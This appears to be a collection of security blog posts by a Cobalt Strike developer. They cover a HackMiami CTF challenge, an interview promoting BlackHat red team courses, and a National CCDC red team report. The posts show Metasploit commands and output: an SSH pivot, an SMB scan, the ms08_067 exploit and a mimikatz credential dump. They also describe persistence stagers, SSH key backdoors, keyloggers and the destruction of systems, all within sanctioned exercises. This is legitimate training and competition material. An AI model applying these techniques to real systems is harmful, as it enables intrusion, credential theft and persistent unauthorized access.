Last weekend, I was enjoying the HackMiami conference in beautiful Miami Beach, FL. On Sunday, they hosted several hacking challenges in their CTF room. One of the sponsoring vendors, a maker of network security appliances setup a challenge too. The vendor placed an unpatched Windows XP device behind one of their unified threat management devices. The rules were simply: they would allow all traffic inbound and outbound, through a NAT, with their intrusion prevention technology turned on. They were looking for a challenger who could exploit the Windows XP system and get positive command and control without their system detecting it.


I first heard about this challenge from an attendee who subjected me to some friendly goading. “You wrote a custom payload, your tools should walk right through it”. Not really. Knowing the scenario, my interest in participating was pretty low. I can launch a known implementation of ms08_067_netapi through an Intrusion Prevention Device, but to what end? I fully expected the device to pick it up and squash my connection. The Metasploit Framework has a few evasion options (type show evasion, the next time you configure a module), but I expected limited success with them.

The representatives from the vendor were pretty cool, so I opted to sit down and see what they had. The vendor rep told me the same network also had a Metasploitable Virtual Machine. This immediately made life better. My first act was to try to behave like a legitimate user and see if it works. If legitimate traffic can’t go through, then there’s little point trying a hacking tool.

I ran ssh and I was able to login with one of the known weak accounts against the Metasploitable Virtual Machine. Funny enough, this was a painful act. One person thought they could get past the device by attempting a Denial of Service, hoping to make it fail open by default. Another person wanted to further everyone’s learning and decided to ARP poison the network. Narrowing down these hostile factors took some time away from the fun.

A static ARP entry later and I was ready to try the challenge again. I’ve written about tunneling attacks through SSH before, but the technique is so useful, I can’t emphasize it enough.

First, I connected to the Metasploitable Linux system using the ssh command. The -D flag followed by a port number allows me to specify which port to set up a local SOCKS proxy server on. Any traffic sent through this local SOCKS proxy will tunnel through the SSH connection and come out through the SSH host.

ssh -D 1080 [email protected]

Next, I had to instruct the Metasploit Framework to send its traffic through this SOCKS proxy server. Again, easy enough. I opened a Metasploit Framework console tab and typed:

setg Proxies socks4:

The setg command globally sets an option in the Metasploit Framework. This is useful for Armitage and Cobalt Strike users. With setg, I can set this option once, and modules I launch will use it.

Finally, I had to find my target. The vendor had setup a private network with the target systems. I typed ifconfig on the Metasploitable system to learn about its configuration. I then ran auxiliary/scanner/smb/smb_version against the private network Metasploitable was on.

msf &gt; use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) &gt; set THREADS 24
THREADS =&gt; 24
msf auxiliary(smb_version) &gt; set SMBDomain WORKGROUP
msf auxiliary(smb_version) &gt; set RHOSTS
RHOSTS =&gt;
msf auxiliary(smb_version) &gt; run -j
[*] Auxiliary module running as background job
[*] Scanned 049 of 256 hosts (019% complete)
[*] Scanned 062 of 256 hosts (024% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] is running Windows 7 Professional 7601 Service Pack (Build 1) (language: Unknown) (name:FGT-XXXX) (domain:WORKGROUP)
[*] is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] is running Windows XP Service Pack 3 (language: English) (name:XXXX-44229FB) (domain:WORKGROUP)
[*] Scanned 119 of 256 hosts (046% complete)
[*] Scanned 143 of 256 hosts (055% complete)
[*] Scanned 164 of 256 hosts (064% complete)
[*] Scanned 191 of 256 hosts (074% complete)
[*] Scanned 215 of 256 hosts (083% complete)
[*] Scanned 239 of 256 hosts (093% complete)
[*] Scanned 256 of 256 hosts (100% complete)

Once I discovered the IP address of the Windows XP system, I was able to launch exploit/windows/smb/ms08_067_netapi through my SSH proxy pivot. This, in effect, resulted in the exploit coming from the Metasploitable system on the same private network as the Windows XP target. I used a bind payload to make sure Meterpreter traffic would go through the SSH proxy pivot as well.


At this point, I had access to the Windows XP system and I was able to take a picture of the vendor with his webcam and use mimikatz to recover the local password. Still undetected.

meterpreter &gt; use mimikatz
Loading extension mimikatz...success.
meterpreter &gt; wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
[*] wdigest credentials

AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;999    NTLM       WORKGROUP        XXXX-44229FB$
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE
0;54600  NTLM
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE
0;62911  NTLM       XXXX-44229FB     Administrator     password123!

There’s a lesson here. Don’t attack defenses, go around them.

Red Team Training at BlackHat USA

Before developing Cobalt Strike, I conducted interviews with several penetration testing practitioners. I wanted to dig into their process, the tools they used, the gaps they saw, etc. Three folks from the Veris Group sat down with me for three hours to go over these very questions. It was at this time, I became familiar with David McGuire and Jason Frank.

Our relationship has evolved, to the point where they advise on Cobalt Strike, teach the product, and Veris Group is also a Cobalt Strike customer.

At BlackHat USA, Veris Group will teach two courses: Adaptive Penetration Testing and Adaptive Red Team Tactics. These two offerings grew out of their Adaptive Penetration Testing course which they’ve taught at BlackHat USA the past few years.

Last year, David and Jason approached me and offered to include Cobalt Strike on the DVD they provide to the students of their course. This then evolved to including a lab with Cobalt Strike. Which then evolved to them opting to use Cobalt Strike as the platform to demonstrate their Adaptive Penetration Testing process.

I have my own course offerings, but my offerings are focused only on my toolset. These courses will give you the foundation to setup a complete red team and penetration testing assessment process using Cobalt Strike and other tools. Their perspective is available once a year at BlackHat USA, I highly recommend that you take advantage of it.


To give you some more insight into these courses, I’d like to share an interview I conducted with Jason and David on their BlackHat courses:

1. How many times have you taught at Black Hat and what made you want to teach there?

David and Jason: We’ve had the opportunity to teach the class twice at Black Hat USA and once at Black Hat UAE. Black Hat provides smaller independent trainers like us, who don’t do this full time, with a great venue to reach a broad potential audience. They handle all the logistical work (such as securing a venue, billing and marketing) so we can focus on delivering quality course material that benefits our students. We are very appreciative of the opportunity they give small trainers and the working relationship we’ve been able to establish.

2. In your words, what are the differences between the Adaptive Penetration Testing and Adaptive Red Team Tactics courses?

David and Jason: The focus of Adaptive Penetration Testing (APT) is to provide students with a framework for providing comprehensive assessments with the objective of demonstrating the risk, in terms of business impact, of potential system breeches. The end goal is for students to be able to take the techniques, procedures, and methodologies we have developed through our experience and implement them in their own operational environments. Assessments utilizing the methodology we discuss in APT are targeted to take one to two weeks to execute effectively.


Adaptive Red Team Tactics (ARTT) is meant as a follow on to APT and focuses on emulating a more advanced threat. This course covers more advanced tactics, techniques and procedures (TTPs) that enable our students to provide a more realistic assessment of defense, detection, and response capabilities in organizations with mature IT security programs. Red Team assessments generally have an extended assessment window and incorporate techniques for providing a more covert, “low and slow,” assessment with a heavy focus on intelligence gather and long term post-exploitation activities. Stealth, evasion, robust persistence, and data exfiltration are some of the main themes of ARTT.


3. What is the secret sauce of your courses? What will you teach that students can’t get elsewhere?

David and Jason: We focus heavily on the tools, techniques and methodologies that we have developed through our experience performing assessments and building internal penetration testing programs for our customers. While we thought there was some really great training out there, we felt there was an opportunity for us to fill a legitimate need in the industry by offering training that focuses on how to effectively conduct assessments in operational environments. In our courses, we want to make sure students understand the entire process of executing a Penetration Test or Red Team assessment, including everything from scoping to exploiting systems to delivering a comprehensive report.  We structure and deliver our course material so students walk away from the course with something they can easily use as a reference when conducting their own assessments. We also include templates and other material that offer students a foundation for creating a program/service from the ground up.


We think another big differentiator in our courses is our incorporation of Cobalt Strike. We feel that one of the gaps in a lot of training out there is that they do not effectively cover the professional tools that can assist in delivering efficient, effective, and repeatable assessments. Cobalt Strike is a full-fledged toolset we use every day in our penetration tests and red team assessments. It enables us to save a lot of time in execution and have quick access to some powerful capabilities. We believe that when testers are in the middle of an assessment, they should be able to focus on assessing the risk/business impact of breeches for their customer, not wrestling with their tools. Tools don’t make the tester, but knowing which tools can best augment your capabilities is often as important as knowledge of great penetration testing techniques.

Raphael: *cough* *cough* Last year, I spent some time with David and Jason at the Veris Group headquarters. Jason constantly rolled his eyes at David and I. Apparently, when we sit down together, we’re like two Furbies going into an infinite loop. Once we broke out of our chat routine, I sat down to go through their labs. I couldn’t do them. David and Jason kept providing hints, but I really did not know. The labs were related to lateral movement and abusing trust relationships. This is a topic that I don’t feel is well covered in other places and their courses both address this topic with a lot of depth.


4. Why isn’t this material taught in other places?

David and Jason: Many courses seem to focus either on foundational knowledge of penetration testing, or technical intricacies of various advanced techniques. While a lot of these are really great courses, we felt they often didn’t leave students with the ability to go execute well-planned and comprehensive assessments on their own. We designed APT for students who don’t need more foundational knowledge, but do need to run effective assessments to add value for their customers. Many course also focus on tools and techniques that are freely available, but operational penetration testing teams use the most effective tools for the job, whether freely available or commercial. We wanted to train on tools and techniques that students would actually use in the field.

When it comes to ARTT, we felt there are few advanced penetration testing courses available, especially relative to the number of courses that teach the fundamentals. Those that are available typically focus on techniques such as exploit development, but few seem to focus on emulating the techniques of the advanced threats that are actually targeting organizations today. We bring our experience in conducting red team assessments for the Federal government, where the objective is to analyze systems the way an adversary would versus utilizing the latest and greatest exoteric technique.


5. How did Cobalt Strike end up in your courses?

David and Jason: When we first developed the APT course, we faced the same limitations most courses do in many of the tools we were teaching weren’t the ones we actually used on assessments. One of the only tools that came close to something we could use operationally was Armitage. As Cobalt Strike was a natural progression from Armitage, when it was released, we found it was the perfect fit to move to for our primary penetration testing platform. In keeping with our objective of training for operational testing, we also thought this was a great opportunity to showcase the capabilities a professional toolset can provide. We found Raphael had much of the same mindset for penetration testing and training we did and was enthusiastic about assisting us in improving our training offering. Cobalt Strike was exactly what the course intended to provide, a turn-key approach to accomplish common, sometimes tedious, tasks so the assessor can spend more time performing effective threat emulation.

Way to sell them on buying Cobalt Strike guys -- Raphael
Way to sell them on buying Cobalt Strike guys — Raphael

Cobalt Strike was actually one of the primary reasons we were able to offer the ARTT course this year. One of the significant barriers to teaching (and conducting) red team assessments is the specialized toolsets red teams use. These toolsets are generally highly specialized, require a significant amount of support, and are almost never released. These issues make training red team tactics much more difficult. However, over the past year Raphael added many red team capabilities to Cobalt Strike. While Cobalt Strike is great for enabling a standard penetration testing team to emulate more advanced threats, it also gave us the opportunity to train on many of the more advanced tactics we use in our red team assessments.

Raphael: I know the real story. A few years ago, David and Jason were teaching Adaptive Penetration Testing. One of their students used Armitage to chewed through their entire exercise environment, like it was nothing (this is a very common Armitage story–in many classrooms). This is what got their attention and it’s part of what got us talking in the first place. 🙂

6. Who should take your courses?

David and Jason:

  • Penetration testers and/or managers with prior knowledge/training/experience who are looking to maximize their programs
  • Individuals interested in starting a penetration testing capabilities
  • Penetration testers and/or managers with prior knowledge and experience with penetration testing tools and techniques interested in emulating a more sophisticated threat capability
  • Individuals who would like a better understanding of the tactics, techniques and procedures of more advanced adversaries

Raphael: If you’re a prospective (or active) Cobalt Strike user, I highly recommend signing up for one of these courses. If you’re planning to use Cobalt Strike in a variety of engagements, take Adaptive Penetration Testing. If you’re primarily focused on threat emulation and red teaming, take Adaptive Red Team Tactics. David and Jason are very experienced in the subject matter they’re teaching. They know Cobalt Strike and we view threat emulation and penetration testing through the same lens.

National CCDC Red Team – Fair and Balanced

Saturday, 6:30pm ended my 2013 red teaming season. I’ve participated in the Collegiate Cyber Defense Competition as a red team volunteer since 2008. I love these events primarily because of the opportunity I get to interact with the student teams and learn from my peers in this field. But, since 2011, I’ve also traveled to these events with an agenda of exercising my tools, testing improvements, and getting new ideas.

2013 was the first year I had an opportunity to exercise Cobalt Strike and its capabilities at these events. CCDC exercises don’t offer a client-side attack surface, which takes some Cobalt Strike features out of play. However, it’s collaboration capabilities, Cortana scripting, Beacon agent, and the ability to manage multiple team servers are all very relevant to a CCDC red team.

I wrote about my experiences at the Western Regional Collegiate Cyber Defense Competition, now I’d like to share what happened on the National CCDC Red Team.

I showed up to San Antonio, TX exhausted. I spent last week participating in two exercises. The Mid Atlantic CCDC event and another grueling (but very challenging and fun) exercise. Once I got to San Antonio, I had dinner with my fellow red team members and I crashed out. I made it to the red team room at about 9:15am, approximately 45 minutes before go time.

This was my second year on the National CCDC Red Team. The National CCDC Red Team operates differently from the regionals. Where regionals are generally a free for all, the National team assigns two red team members to each blue team. We’re allowed to perform actions against other teams, but we must focus on our assigned team first, and we must not disrupt or step on the red team members who own that particular blue team.

When I described this model to my girlfriend, she immediately objected and stated–“that’s not fair! what happens if one team gets less skilled people assigned to them”. Hear me out, this model can work, and during the 2013 National CCDC–we provided the fairest and most balanced red experience I’ve seen at a CCDC event yet.


I spent the 45 minutes before the event getting my initial attack kit prepped. One role I usually fill at CCDC events is the role of initial exploitation and persistence. The Red Team was assigned several IP address ranges. Our team captain, David Cowen, parceled them out by assigning each red team member with a range of addresses they could bind in the last octet of all the ranges.

Once I knew my addresses, I loaded a Cortana script that allows me to generate my persistence artifacts with the appropriate addresses. At CCDC, student teams are allowed to install anti-virus. Unfortunately, most artifacts generated by the Metasploit Framework are caught by anti-virus. I didn’t want to make it that easy to clean us out. So, I opted to write a persistent stager for the CCDC events this year. This stager ships with several addresses embedded to it. Once it is run, it will attempt to connect to each of these addresses, one per minute, until it successfully downloads the second stage of my malware and injects it in to memory. Because this code is not in use elsewhere, no anti-virus product that I’d have to worry about at CCDC catches it.

Seriously, this won't do you that much good.
Seriously, this won’t do you that much good.

Pro-tip: if you found any of my persistence mechanisms and ran strings against it, you would have known my staging addresses and could have blocked them. If you blocked them, you would have blocked my other backdoors that attempted to stage through the same address.

Anyways, I generated my artifacts, before I even had time to bind all of my IP addresses. I setup a local Cobalt Strike instance for the initial attack and I was getting ready to setup a team server when very suddenly, 10am came and Dave shouted “go! go! go!”.

Opening Salvo

The first minutes of any CCDC event are critical. As a red cell member, I do not see CCDC as a game of patching, installing firewalls, and thwarting an attacker who is attempting to scan and exploit you. I see CCDC as an intrusion detection and response game. I want the students to work under the assumption that an attacker is present, focus on their operational security, and develop creative ways to dig us out, spot our activity, or disrupt our command and control. Truth is, once they patch and setup a firewall–if we don’t have access, we’re likely not going to get it. Intrusions today start with the end user for a reason–these other layers of defense stop the easy stuff.

Contrary to popular belief, I no longer script my opening attack. I’ve moved away from it this year. I found at earlier events that my scripted exploitation would sometimes make assumptions that I would need to correct once I understood reality. The Armitage and Cobalt Strike user interfaces are efficient enough to allow me to think on my feet and simultaneously apply an action against all systems–very quickly.

I start most CCDC events with a db_nmap sweep. I don’t care about discovering each open service. I want the low hanging fruit only. I use nmap -sV -O -T4 --min-hostgroup 96 -p 22,445 across all student ranges to discover the easy exploitation opportunities as quickly as possible.

At National CCDC, student teams have two networks: a local network and a cloud network. This year, I opted to go after their local networks first and follow up against their cloud networks second.

Once a scan comes back, I sort my host display by the operating system icon. I simply highlight all Windows systems and launch the ms08_067_netapi module against them. This year, due to a bar on Mubix’s worm, we were given a list of potential default passwords–for the first time in National CCDC history. I used this information to execute psexec against all of the remaining Windows hosts. If I did not have the default credentials, I would use a Cortana script to run Windows Credential Editor to get them.


As Windows sessions came in, I had a Cortana script loaded that would automatically install my beachhead executable onto the systems. The persistence mechanics were nothing new. They were very similar to last year’s Dirty Red Team Tricks talk. The beachhead executable’s only purpose was to connect to me, download Beacon, and inject it into memory.

Once I had the Windows systems, I ran the Metasploit Framework’s ssh_login module against all of the UNIX systems with root and each of the suspect default credentials. Armitage and Cobalt Strike tip–hold Shift as you click Launch to run a module but keep the dialog open. This makes it really easy to try multiple variations of an attack very quickly.

Checking out those SSH keys
Checking out those SSH keys

Once again, I had a Cortana script loaded to automatically install some persistence on the UNIX systems. I didn’t do much to the UNIX systems at National CCDC because I did not want to step on my other red team members. I simply dropped an SSH key for root and altered the SSH configuration to allow the one key to work for any user on the system.

Team Server

After the opening salvo, I successfully exploited the Windows systems with port 445 open in the competition environment and I had root access to the UNIX systems with SSH open (except for the Solaris systems assigned to each team). This whole process took 1 to 2 minutes total. In theory, I had backdoors on each of these systems too, but I had no way to know because I had not yet setup a team server.

I went to work to setup a Cobalt Strike team server. Of the four staging addresses I created, I only bound one of them. Once Cobalt Strike was up, I connected my client to this team server and I setup the Beacon listener and gave it a different list of IP addresses to beacon back to.

Beacon is a Cobalt Strike-specific payload. It doesn’t require a persistent connection to the target, rather it phones home every so often to request tasks to execute. I created Beacon to act as a quiet (in memory) persistence agent. The idea is you can use it to spawn a new Meterpreter session when it’s needed. In a pinch, Beacon can also act as a remote administration tool if your Meterpreter traffic is squashed by network defenses.

Beacon -- give me shell!
Beacon — give me shell!

Once the listener was up, I noticed my Beacons were coming back and I was able to verify that we had all Windows systems in the competition environment at that time. This really allowed us to give students a fair game. Each team was owned, from the beginning, with the same backdoors.

Cobalt Strike Use

I then spent time getting folks, who asked for it, setup with Cobalt Strike so they could task their own Beacons. Several tools were in play on the National CCDC Red Team. I saw msfgui, msfconsole, Core Impact, Dark Comet, and Cobalt Strike. There was some Armitage too early on, but I showed those folks how they could connect Cobalt Strike to multiple Metasploit Framework instances at once and that did away with that.

8 out of 10 blue teams had at least one red team member using Cobalt Strike to conduct post-exploitation and gain more access into their network. By my count, 15 out of 20 red cell members were using Cobalt Strike. 12 of the 20 red team members used only Cobalt Strike–primarily through the local team server without any other penetration testing platform in use. In effect, 8 simultaneous engagements were happening through one team server. Wow!

The workspaces feature helped a lot with this. Each Cobalt Strike user was able to define a workspace that showed them only the hosts, services, and sessions for their team.

Collaborative Hacking at its Finest
Collaborative hacking… at its finest

As a developer, nothing excites me more than seeing someone use a tool I wrote. I’m very honored that so many well respected professionals in this field gave Cobalt Strike’s toolset a try during the National CCDC event.

Other Tools

Some custom stuff was in use during National CCDC. We had a custom Linux backdoor, something that works a lot like Beacon deployed to student systems. We also used Dark Comet to further fortify our access to student systems once the initial salvo was complete. Individually, a few red team members chose to deploy different RATs against their specific team, but I’m not aware of anything else that was done on an all teams basis.

We were also using a data management system developed by Alex Levinson, Maus, and Vyrus to keep track of shared information and automatically track red activity, based on a Metasploit Framework instrumentation plugin. My favorite part of the whole system–it integrates etherpad and I’m in love with etherpad for red team information sharing. It’s much better than a wiki.


Once we were in, post-exploitation was up to each individual cell. Knowing that we had equal access and persistence across all teams, I greatly enjoyed the opportunity to focus on one team. The first day, our job as the red team was to stay in and quietly steal data. We were under strict instructions to not do anything that might reveal our presence. I spent the first day setting up keystroke loggers, downloading interesting files, taking screenshots, and occasionally sweeping the network to try to get access to other hosts that the initial salvo didn’t give us.

Windows Credential Editor is my co-pilot
Windows Credential Editor is my co-pilot

At the start of day 2, we still had access on Windows systems on all team’s cloud networks. We also had access to at least one box on most of the team’s local networks. Some systems were beaconing to our local team server, a few were beaconing over DNS to a node in Amazon’s elastic computing cloud. The National CCDC event required teams to configure a proxy on each Windows system for it to connect to the internet. This didn’t happen on all systems, limiting my external Beacons. The second pool of accesses was still helpful in some cases though.

On day two, our team captain started blasting some classical music and instructing us to burn all of our boxes. The idea–get in on day 1, stay there, let the students snapshot their virtual machines with our backdoors, let them trust their snapshots, and on day 2–destroy their systems. We bounced systems for the first few hours of the day. We would jump on, destroy it, the students would restore it, our beacons would phone home, we’d request a meterpreter session, and then we’d destroy the system again.

blue team: nooooo red team: yes yes yes
blue team: nooooo red team: yes yes yes

This happened all throughout the morning. As a person who likes to keep access until the end, this was scary. Students were put into a catch-22 situation. They could revert to a snapshot with all of the work they did to the system + our backdoors or they could revert to a clean image. By the end of the morning, many teams opted to revert to the clean image.

We were able to re-exploit systems hosted in the student’s cloud networks when they were reverted to a clean image and rebackdoor them. That part was pretty easy. As the day went on, one red cell member might make a discovery and call everyone else’s attention to it. We would then work on replicating that discovery in our environment.

For example, Matt Weeks discovered a webshell pre-implanted by the competition organizers on an internal system. All of us found the webshell on our teams and went to work through it. In the default configuration, this webshell existed on Windows systems giving us access to internal networks for some of the teams. By this time, access to internal networks was a nice find. We bounced student systems so many times, that the teams reverted to a clean snapshot for their internal systems.

My team had migrated their web server from Windows to Ubuntu Linux. Fortunately, they kept the webshell with the migrated site giving us access to that system as well.

Each red team member had a good understanding of the point system. We knew, for example, that a root/administrator level intrusion counted once and only once per unique attack vector. There was no point in exploiting systems time and again with the same thing.

We also knew that credit cards and other data flags were worth points.

One of the biggest hits we could make a team take came from publishing credit card information to their website for the whole world to see. We made sure to make this happen for all teams, where it was possible.

Overall, the plan worked. We didn’t achieve Dave’s life long dream of seeing every team down for every service across the board. But, we were very well organized, we collaborated, and this year we gave the students at the National CCDC event the fairest and most balanced red experience yet.

Congratulations to RIT on its first National CCDC win. Congratulations to Dakota State University on a very close second place finish.

See also: